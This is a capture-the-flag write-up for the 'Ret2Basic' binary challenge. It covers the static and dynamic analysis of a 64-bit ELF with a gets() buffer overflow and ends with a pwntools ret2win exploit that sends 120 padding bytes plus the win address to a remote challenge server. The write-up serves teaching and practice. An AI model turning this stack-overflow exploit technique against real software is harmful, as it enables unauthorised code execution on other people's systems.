Rating:
## Ret2Basic
> **Description** : *Cay you return to win?*
>
> **Author**: *Author: @M_alpha#3534*
>
>**Points**: *50 points*
>
### *Static Analysis*
- Using the `file` command we can see that the binary is an 64-bit ELF binary that is `not stripped` and that is `dynamically linked`.
- Using `rabin2 -i chall` we can see the imports and we can see `gets` this obviously shows there is a buffer overfow vulnerability in the program.
- `rabin2 -I chall` This will give us more info about the binary including the backended programming language that was used to write the program
- `rabin2 -z chall`: There is an interesting`flag.txt` this is an indication that there is a function that opens and reads the flag
- `checksec` Only NX is enabled in the binary therefore not much protections.
### *Dynamic Analysis*
- Running the binary not much just a statement `can you overflow this?:` this gets our input and exits.
- Load your favourite debugger and get to work. We can see a function `win` in the binary at the address `0x401215` disassembling this function this is what
opens the `flag.txt` file.
- Our input is passed to `gets` as predicted earlier and therefore a `bof` therefore we can call `win` and control `rip` because no `stack canaries`.
- That was easy right :P
### *Exploitation*
- The offset is `120` therefore if we load a payload `"A"*120 + <address_of_win>` we call win that reads the flag. Therefore the exploit is a follows
using `python and pwntools`.
```
#!/usr/bin/python3
from pwn import *
#io = process("./chall")
io = remote("challenge.nahamcon.com", 30413)
elf = ELF("./chall")
offset = 120
def main():
payload = b"A"*offset
payload += p64(elf.sym.win)
io.sendlineafter(":", payload)
io.interactive()
if __name__ == "__main__":
main()
#flag{d07f3219a8715e9339f31cfbe09d6502
```
